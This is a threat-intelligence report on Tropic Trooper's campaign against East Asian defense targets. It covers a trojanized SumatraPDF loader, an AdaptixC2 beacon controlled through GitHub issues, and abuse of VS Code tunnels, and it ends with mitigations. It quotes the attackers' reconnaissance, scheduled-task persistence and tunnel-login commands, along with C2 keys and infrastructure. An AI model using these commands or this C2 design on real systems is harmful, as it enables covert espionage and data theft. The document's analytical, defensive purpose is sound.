【CyCraft Monthly Intelligence】Forged Military Documents as Cover for Infiltration: Tropic Trooper Abuses GitHub and VS Code Channels to Launch Stealthy Espionage Attacks Targeting Taiwan, Japan, and South Korea

‍

Threat and Impact

This incident reflects a highly targeted cyber espionage campaign with strong attribution to Tropic Trooper (also known as Earth Centaur and Pirate Panda). According to Zscaler ThreatLabz, the campaign utilizes malicious ZIP archives containing military-themed bait documents, specifically targeting Chinese speakers in Taiwan, as well as victims in South Korea and Japan. The lure content spans weapon systems, submarine collaborations, unmanned systems, and defense industry planning, strongly indicating that their intelligence collection is focused on defense, national security, and strategic technological interests.

‍

Analyst Perspective

The primary initial access vector is phishing to entice users into executing malicious files. The malicious archives contain multiple filenames in Simplified Chinese that reference military-oriented topics, such as drones, submarines, and the metaverse. This suggests that the campaign likely targets personnel related to Taiwanese intelligence or military sectors. Furthermore, the adoption of GitHub as a Command and Control (C2) mechanism, alongside the open-source AdaptixC2 framework, underscores a growing trend among threat groups to leverage off-the-shelf tools and customize fine details to minimize the likelihood of detection.

‍

Incident Description

This threat warrants significant attention due to its sophisticated combination of social engineering, trojanized legitimate software, evasive multi-stage malware, and the abuse of trusted services. The attackers disguise their initial payload as document-related files by using a trojanized version of the legitimate SumatraPDF executable, subsequently deploying an AdaptixC2 Beacon via a staged infection chain. Following this, they utilize a customized, GitHub-based C2 channel and further abuse Visual Studio Code tunnels to gain remote, interactive access to targeted systems. This approach allows the adversaries to blend their malicious activity into legitimate software and widely trusted cloud services, making detection and response exceptionally difficult.

The impact of this campaign centers primarily around target endpoint compromise, persistent access, reconnaissance, and potential data exfiltration. The malware has been observed harvesting system and network configuration data, establishing persistence mechanisms via scheduled tasks, and exfiltrating files from infected machines. If a victim is deemed highly valuable, the attackers escalate their access by deploying VS Code tunnels. This demonstrates a "hands-on-keyboard," human-operated intrusion model tailored for long-term monitoring and subsequent operations rather than random malware distribution.

From an industry perspective, this campaign is uniquely relevant to organizations and individuals affiliated with the military, defense, government, research, and strategic industrial sectors in East Asia. Although the reports do not name specific organizations, the lure themes and the geographic distribution of victims indicate that the focus is on personnel who may have access to sensitive policy, technological, or operational information. This aligns perfectly with Tropic Trooper’s historical profiling of targeting sectors tied to defense intelligence and regional geopolitical interests.

Another critical dimension of this threat is the technical maturity of the adversaries. Using GitHub as both a C2 channel and an exfiltration pipeline, combined with the rapid deletion of footprints generated by the beacon, demonstrates an intentional effort to minimize forensic visibility and hinder defenders' analysis of communications. This campaign also exhibits continuity with Tropic Trooper’s previous operations—specifically Operation TAOTH—while signaling a tooling evolution through the shift toward AdaptixC2 and customized infrastructure. This demonstrates that the threat group remains active, highly adaptive, and deeply committed to long-term intelligence-gathering operations.

Technical Details

The intrusion chain of this incident comprises multiple stages, combining a trojanized legitimate application, an in-memory loader, an open-source beacon modified for covert command and control, and the subsequent abuse of trusted developer tools to maintain persistent remote access. Overall, the compromise begins when a victim executes a malicious file masquerading as a military-themed document. This executable is actually a backdoored SumatraPDF binary embedded with the TOSHIS loader. It fetches a bait PDF to display to the user while simultaneously downloading, decrypting, and executing an AdaptixC2 Beacon directly in memory. Subsequently, the attackers utilize a customized GitHub-based listener for command and control, and deploy VS Code tunnels on select systems to achieve more interactive access. The following sections detail how this attack operates, categorized by MITRE ATT&CK tactics.

Reconnaissance

After establishing an initial foothold, the attackers primarily utilize the AdaptixC2 implant to assess the victim environment, determining whether a specific system warrants deeper access. Their reconnaissance activities include both local host and external network checks.

Observed commands include:

• arp /a: Used to view the ARP table and map out adjacent network relationships.
• net view \\192.168.220.2: Enumerates accessible resources on a remote host.
• tasklist | findstr /i note: Searches for running processes of interest.
• wmic process where processid=8528 get commandline: Inspects specific process execution details.
• curl -s 'ip.me?t=1&m=2' and curl ip.me?t=1&m=2: Identifies the public IP address of the host.

The AdaptixC2 Beacon also queries ipinfo.io using a hardcoded curl/8.5.0 User-Agent to determine the egress IP of the victim machine. This is critical because the attackers' GitHub-based C2 architecture does not naturally expose the victim's source IP to the operator.

Resource Development

This operation relies heavily on pre-staged infrastructure and customized tooling rather than off-the-shelf commodity malware.

The attackers:

• Create a GitHub account and repository (cvaS23uchsahs/rss) utilized for C2 communications.
• Develop a customized GitHub-based listener for the AdaptixC2 Beacon.
• Deploy the custom TOSHIS loader embedded within the trojanized SumatraPDF binary.
• Procured and modified the open-source AdaptixC2 Beacon as a second-stage implant.
• Stage a staging infrastructure at 58.247.193[.]100 to host bait PDFs and encrypted second-stage payloads.
• Stage additional tools, including VS Code, through external hosting sites like bashupload[.]app.

This combination highlights the tiered nature of their toolchain: custom loader development, repurposing open-source malware, and the abuse of legitimate cloud services and developer tools.

Initial Access

Initial access relies on user execution of a malicious file delivered via a ZIP archive containing military-themed baits. Among multiple lure documents, the critical payload is an executable named to resemble a defense-related document: Comparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exe. Although it appears to be a PDF lure, it is actually a trojanized SumatraPDF executable. Therefore, the attack relies entirely on social engineering and user execution rather than software vulnerabilities.

Execution

When the victim launches the fraudulent document executable, the malware initiates a highly orchestrated sequence of malicious actions.

Stage 1: Trojanized SumatraPDF and TOSHIS Loader

The binary closely mimics the legitimate, open-source SumatraPDF reader. It retains seemingly authentic metadata, including certificates and PDB paths; however, because the file has been modified, its code signature is invalid.

Unlike earlier TOSHIS variants that modified the entry point, this version hijacks execution flow by overwriting _security_init_cookie to redirect control flow to the attacker's code. This is a fundamental root-cause detail: the malware does not merely append malicious logic; instead, it modifies early-stage initialization functions to ensure that the backdoor logic executes prior to normal application behavior.

The injected function performs the following steps:

• Construct stack strings containing the staging IP address, bait file path, DLL name, and cryptographic material.
• Dynamically resolve Windows APIs using Adler-32 hashing.
• Download the bait PDF from 58.247.193[.]100.
• Launch the bait PDF using ShellExecuteW to distract the victim.
• Download the second-stage shellcode payload from the same server.
• Decrypt the payload using WinCrypt APIs and AES-128-CBC.
• Execute the shellcode directly in memory.

Research analysis indicates that the AES key is derived via CryptDeriveKey from the MD5 hash of a hardcoded seed (424986c3a4fddcb6), with the initialization vector (IV) set to zero.

Stage 2: In-Memory Inception of AdaptixC2 Beacon

The decrypted shellcode is an AdaptixC2 Beacon agent. Rather than writing a traditional executable to disk, the loader executes the payload reflectively in memory, thereby minimizing forensic visibility and complicating file-based detection.

Post-Foothold Command Execution

Once the implant is running, operators issue commands via the beacon to perform reconnaissance and prepare for subsequent access. These commands include using the Windows command shell and curl to fetch additional payloads and tools, including VS Code.

Persistence

The attackers establish persistence by creating scheduled tasks. Observed examples include:

• schtasks /create /tn \\\\MSDNSvc /sc hourly /mo 2 /tr
  C:\\\\users\\\\public\\\\documents\\\\dsn.exe /f /RL HIGHEST
• schtasks /create /tn \\\\MicrosoftUDN /sc hourly /mo 2 /f /tr
  C:\\\\Users\\\\Public\\\\Documents\\\\MicrosoftCompilers.exe
  C:\\\\Users\\\\Public\\\\Documents\\\\2.library-ms

They are also observed triggering a task manually:

• schtasks /run /i /tn \\\\MicrosoftUDN

These tasks are configured to run every two hours, ensuring that the attackers maintain access across system reboots or network disruptions.

Privilege Escalation

A clear indicator of elevated execution is the use of the /RL HIGHEST flag during scheduled task creation:

• schtasks /create /tn \\\\MSDNSvc ... /RL HIGHEST

This indicates that the attackers already possess sufficient privileges or are operating within a context that permits task creation at the highest execution level. While the report does not detail specific privilege escalation exploits, this command confirms that they leverage administrative execution to solidify persistence and control.

Defense Evasion

• Masquerade as Legitimate Software: The initial malware is embedded within a trojanized SumatraPDF executable, retaining plausible certificate information and a normal application appearance to increase the likelihood of being trusted or overlooked during casual inspection.
• Deceptive Invalid Code Signatures: Although the original signature is invalidated post-trojanization, the familiar vendor-related metadata helps the file pose as harmless software.
• Dynamic API Resolution: The loader resolves APIs using Adler-32 hashes instead of storing API names in plaintext, reducing obvious strings during static analysis.
• Encrypted Second Stage: The second-stage shellcode is stored in an encrypted format and is decrypted exclusively in memory using AES-128-CBC, shielding the true payload from simple file scanning.
• Reflective Code Loading: The AdaptixC2 Beacon runs directly in memory rather than being written to disk as a standard DLL or EXE, minimizing the file footprint.
• Camouflaged Scheduled Tasks: Persistence tasks are assigned names like \MSDNSvc and \MicrosoftUDN, designed to blend in as legitimate Windows or enterprise software components.
• Abuse of Trusted Tools: The campaign subsequently abuses legitimate tools such as VS Code and Roslyn/Microsoft compiler components. Operating via developer tools allows the attackers to blend malicious activity into software that is likely already permitted within enterprise environments.
• Operational Security of GitHub C2: GitHub beacon issues are typically deleted within approximately 10 seconds. This is likely intended to destroy session keys and hinder passive monitoring or post-incident analysis of C2 traffic.

Discovery

Operators utilize native commands to understand the compromised host and its surrounding environment. Discovery activities include:

• arp /a gather clues regarding local network configuration.
• Requests to ipinfo.io and ip.me identify the external egress IP.
• net view \\192.168.220.2 inspects accessible network resources.
• tasklist | findstr /i note identifies running processes.
• wmic process where processid=8528 get commandline inspects process arguments.

This discovery phase appears to support victim triage: only systems deemed high-value are advanced to the more interactive VS Code tunnel stage.

Lateral Movement

The most critical lateral movement capability observed in this campaign is the abuse of VS Code tunnels for remote access.

Observed commands include:

• cd C:\\\\Users\\\\Public\\\\Documents & code tunnel user login --provider github > z.txt
• code tunnel user login --provider github > z.txt
• tasklist|findstr /i code.exe || code tunnel user login --provider github > z2.txt

Operationally, the attackers appear to use AdaptixC2 for initial access and reconnaissance, subsequently upgrading select victims to a more hands-on-keyboard phase by installing or invoking the tunnel feature of VS Code. This grants them interactive remote access through a legitimate service tied to GitHub authentication.

The command net view \\\\\\\\192.168.220.2 also indicates that they check reachable remote systems and shared resources, which likely supports internal movement or expansion within the environment.

Collection

The AdaptixC2 Beacon supports file collection from the local system via its fileupload tasking mechanism. In practice, operators can issue tasks to extract specific files from the victim host, demonstrating that the malware possesses built-in capabilities to harvest data of interest for subsequent exfiltration.

Command and Control (C2)

Command and Control in this incident is one of the most technically distinctive aspects of the entire campaign.

Stage 1 Download Infrastructure

The trojanized SumatraPDF/TOSHIS loader contacts 58.247.193[.]100 via plaintext HTTP to retrieve:

• The bait PDF
• The encrypted second-stage Shellcode

Custom GitHub-Based AdaptixC2 Listener

The second-stage implant is an AdaptixC2 Beacon configured to use a custom GitHub listener instead of standard HTTP or TCP listeners. Extracted configurations include:

• Repository Owner: cvaS23uchsahs
• Repository Name: rss
• API Host: api.github.com
• Issues Path: repos/cvaS23uchsahs/rss/issues?state=open
• Sleep Delay: 60 seconds
• Jitter: 42
• RC4 Config Key: 7adf76418856966effc9ccf8a21d1b12

Upon initialization, the beacon generates a 16-byte RC4 session key using RtlRandomEx(GetTickCount()). It also generates a random 4-byte agent ID, which is regenerated every time the malware initializes. Because GitHub does not expose the victim's source IP to the operator, the implant queries ipinfo.io and appends the external IP into the beacon traffic.

GitHub Issue-Based Workflow

The beacon establishes a session by sending a POST request to GitHub Issue #1. It then polls open issues to retrieve commands. Rather than using a full JSON parser, the malware extracts fields like the issue number, title, and body using substring matching.

Tasking logic depends on the issue title:

• beat: Treated as a heartbeat issue and skipped.
• Titles starting with upload and ending in .txt: Interpreted as task files, usually embedding the agent ID.
• Titles starting with fileupload: Treated as file exfiltration directives.
• Other titles: Base64-decoded and treated as commands.

After processing a task, the implant packages the response, which includes:

• The previously encrypted beacon packet.
• The task output encrypted with the RC4 session key.

This combined buffer is Base64-encoded and uploaded back to GitHub as a repository content file. If the data exceeds 30 MB, it is split into 30 MB chunks. The implant then posts an issue comment indicating which uploaded file corresponds to a specific command, utilizing |@@@| as a multi-part response delimiter. This design allows the attackers to achieve full bidirectional C2 via a trusted cloud service, blending their traffic into normal HTTPS requests to GitHub.

Additional Tool Transfer and Remote Access

The attackers also use curl to grab tools and payloads from:

• code.visualstudio.com
• bashupload[.]app

This facilitates the deployment of VS Code and other post-exploitation components.

Exfiltration

Exfiltration is conducted via the same GitHub-based C2 channel used for tasking. The fileupload capability of the AdaptixC2 Beacon allows operators to request files from the infected system. The implant subsequently:

• Collect the specified file.
• Encrypt the response data.
• Encode the entire payload with Base64.
• Upload it as content to the GitHub repository.
• Split large files into 30 MB chunks if necessary.
• Post an issue comment identifying the resulting uploaded file.

Using GitHub as both a C2 and exfiltration platform minimizes the need for stand-alone attacker infrastructure and makes malicious traffic much harder to distinguish from legitimate developer activity.

In conclusion, the root cause of this intrusion lies in the successful execution by a user of a trojanized executable masquerading as a relevant military-themed document. The technical maturity of this campaign is demonstrated by how it converts this initial execution into a covert, multi-stage compromise: hijacking control flow inside a trusted application, delivering encrypted in-memory payloads, operating a custom GitHub-based AdaptixC2 channel, and ultimately abusing VS Code tunnels to achieve persistent, human-operated access.

‍

Mitigation

Because this incident does not rely on publicly disclosed software vulnerabilities, mitigation efforts must focus on preventing initial user execution, restricting the abuse of trusted services, detecting multi-stage malware behaviors, and limiting post-compromise persistence and remote access. In practice, the most critical security controls and services impacted include email and web security, endpoint protection, application control, egress network policies, GitHub access controls, VS Code tunnel usage, Windows Task Scheduler monitoring, and threat hunting workflows.

1. Reducing Initial Execution Risks

This attack begins with a malicious ZIP archive containing an executable disguised as a document-related file. Therefore, organizations should strengthen controls over archives and executables delivered to users.

Recommended measures include:

• Blocking or isolating ZIP archives that contain executable content, particularly when filenames mimic legitimate documents.
• Enforcing Mark-of-the-Web (MotW), SmartScreen, or equivalent reputation checks for files downloaded from the internet.
• Utilizing application whitelisting mechanisms, such as Windows Defender Application Control (WDAC) or AppLocker, to permit only approved binaries to execute.
• Rejecting or alerting on invalid code signatures, as the trojanized SumatraPDF retains seemingly legitimate metadata but its signature becomes invalid after modification.
• Restricting binary execution from user-writable and common staging locations, such as Downloads, Temp, %LOCALAPPDATA%, and public document folders.
• Impacted Controls and Services: Endpoint execution policies, attachment handling, browser download protection, and software trust configurations.

2. Detecting and Blocking Second-Stage Delivery

The loader downloads a bait PDF and an encrypted second-stage payload from the attacker's infrastructure, executing the payload directly in memory. To minimize exposure risks:

• Block the known malicious infrastructure and file indicators listed in the subsequent IoC section, including the staging IPs, listed URLs, and hashes.
• Implement web proxy or Secure Web Gateway (SWG) controls to prevent direct outbound HTTP/HTTPS connections to untrusted IPs and to stop suspicious file downloads.
• Enable sandbox analysis for suspicious executables and archives to identify multi-stage loaders before they reach the endpoint.

3. Disrupting Persistence and Post-Compromise Activity

The operators establish persistence by creating scheduled tasks with camouflaged names and utilize common command-line utilities for reconnaissance, staging, and access configuration. Organizations should:

• Monitor the creation or modification of scheduled tasks, paying close attention to suspicious names such as \MSDNSvc and \MicrosoftUDN.
• Alert on any scheduled tasks configured to execute from public or user-writable directories.
• Detect the suspicious use of native tools like curl, schtasks, tasklist, wmic, net view, and arp, particularly when executed in rapid succession or within an unusual user context.
• Hunt for artifacts specific to this campaign, including z.txt, z2.txt, v.zip, .dat payloads, and any binaries staged within C:\Users\Public\Documents\.
• Enforce the principle of least privilege by restricting local administrative privileges, thereby lowering the attacker's ability to establish persistence and execute tasks at a high integrity level.
• Impacted Controls and Services: Windows logging, Sysmon/EDR telemetry, privilege management, scheduled task auditing, and command-line logging analysis.

Reference

•         Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener

•         中國駭客 Tropic Trooper 鎖定臺灣、日本、韓國，透過 Adaptix C2 與 VS Code 隧道控制受害電腦

•         Untrusted Search Path in sumatrapdf/src/AppTools.cpp

•         #StopRansomware: ALPHV Blackcat

•         Tropic Trooper Uses Trojanized SumatraPDF and GitHub to Deploy AdaptixC2

IoCs (Indicator of Compromise)

Network IoC Analysis

This batch of IoCs perfectly mirrors Tropic Trooper’s attack characteristics of "high stealth and abuse of legitimate services," highlighting three key features:

1. Abuse of Public Clouds and CDNs: The malicious IPs and domains are hosted on Vultr, Alibaba Cloud, and Cloudflare. Instead of building their own proxy nodes, the attackers leverage trusted cloud services to camouflage C2 traffic, making simple IP-blocking significantly more difficult.
2. Localized Stealth: The malicious staging servers are positioned in South Korea and Hong Kong, closely aligning with the target countries (Taiwan, Japan, and South Korea) to bypass geo-blocking policies. Furthermore, the domain name (lsmartv.com) uses a mundane, consumer-styled branding, making it highly effective at evading log reviews.

Files

Network